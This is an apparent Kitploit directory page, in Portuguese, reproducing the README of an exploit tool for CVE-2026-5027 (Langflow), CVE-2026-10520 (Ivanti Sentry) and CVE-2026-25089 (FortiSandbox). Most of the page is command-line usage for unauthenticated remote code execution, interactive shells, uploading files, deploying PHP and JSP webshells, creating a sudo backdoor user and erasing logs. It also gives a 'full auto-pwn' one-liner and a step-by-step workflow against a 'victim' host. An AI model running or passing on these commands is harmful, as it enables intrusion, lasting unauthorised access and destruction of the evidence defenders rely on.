Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5027-Langflow | Kitploit
Ferramentas/GitHubGitHub/layer-6/cve-2026-5027-langflow
Escalada de PrivilégiosMecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
layer-6/cve-2026-5027-langflow

CVE-2026-5027-Langflow

Ver Repositório

(CVE-2026-5027) e (CVE-2026-10520) (CVE-2026-25089) explorador:

Clonar

root@kitploit:~
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow

Uso (arquivo exploit.py)

Teste automático e exploração.

root@kitploit:~
python3 exploit.py -u https://target.com

Configurações personalizadas da CLI

Use sua própria webshell quando a shell estiver dentro de uma pasta:

root@kitploit:~
python3 exploit.py -u https://target.com --shell 

(📁shells/my-shell.php)

Quando a shell está na pasta da ferramenta ou no terminal sem uma pasta:

root@kitploit:~
python3 exploit.py -u https://target.com --shell my-shell.php

Sua webshell pode ser (PHP, Python (CGI), Perl, Ruby, ASPX).

Você pode definir o timeout com --t e carregar/usar payload ou caminho personalizado de pastas e arquivos com --p:

root@kitploit:~
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |

Exemplo:

root@kitploit:~
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt

Uso (arquivo exploitt.py)

Projetado para as seguintes CVEs:

· CVE-2026-10520 (CVSS 10.0)

· CVE-2026-25089 (CVSS 9.1)

Execução Remota de Código Sem Autenticação

Nenhuma credencial necessária.

📖 Uso

Início rápido - menu interativo (sem argumentos)

root@kitploit:~
python3 exploitt.py

Em seguida, siga os prompts:

1. Escolha o tipo de alvo (Ivanti ou Forti)

  1. Insira a URL do alvo (ex.: https://192.168.1.100:8443)
  2. Defina timeout, proxy, modo de depuração
  3. Escolha a ação (comando, shell, webshell, etc.)

Linha de comando (avançado)

1. Ivanti Sentry (CVE-2026-10520)

root@kitploit:~
# Check if vulnerable
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"

# Interactive shell
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s

# Deploy JSP webshell (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w

# Create backdoor user + clean logs
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
  1. FortiSandbox (CVE-2026-25089)
root@kitploit:~
# Single command
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"

# Interactive shell with file upload
python3 exploitt.py -u https://forti.example.com --type forti -s
# Inside shell: upload /path/local.txt /remote/path.txt

# Deploy PHP webshell
python3 exploitt.py -u https://forti.example.com --type forti -w

# Full auto‑pwn (check, shell, webshell, persist, clean)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean
  1. Detecção automática (o script adivinha o serviço)
root@kitploit:~
python3 exploitt.py -u https://target.example.com -c "id"
  1. Use proxy e depuração
root@kitploit:~
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"

Argumentos disponíveis da linha de comando

Argumento Descrição -u, --url URL do alvo (ex.: https://192.168.1.100:8443) --type Forçar serviço: ivanti ou forti (opcional, detecção automática) -t, --timeout Timeout da requisição em segundos (padrão: 30) --proxy Proxy HTTP/HTTPS (ex.: http://127.0.0.1:8080) -d, --debug Ativar saída de depuração --ua String personalizada de User-Agent -c, --cmd Executar um único comando e sair -s, --shell Iniciar shell interativa -w, --webshell Implantar uma webshell (PHP para Forti, JSP para Ivanti) -p, --persist Criar usuário backdoor persistente com sudo --clean Apagar logs e histórico de comandos após a exploração

Comandos da shell interativa

Dentro da shell interativa, você pode usar:

Comando Exemplo Descrição comando normal id Executar qualquer comando do sistema upload upload exploit.sh /tmp/backdoor.sh Enviar arquivo local para o host remoto exit exit Sair da shell

Detalhes da implantação da webshell

· Ivanti Sentry – implanta uma shell .jsp dentro do webapps do Tomcat (/usr/local/tomcat/webapps/ROOT/) · Acesso via https://target/shell_random.jsp?cmd=whoami · FortiSandbox – implanta uma shell .php dentro da raiz web (/var/www/html/) · Acesso via https://target/shell_random.php?cmd=whoami

Exemplo de fluxo de trabalho (teste de penetração completo)

root@kitploit:~
# 1. Detect and exploit
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s

# 2. Inside the shell, check privileges
id

# 3. Deploy webshell for persistence
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w

# 4. Create a backdoor user
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p

# 5. Clean logs
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean

Canal do Telegram Red:

https://t.me/Red_Rooted_Ghost

Baixar ferramenta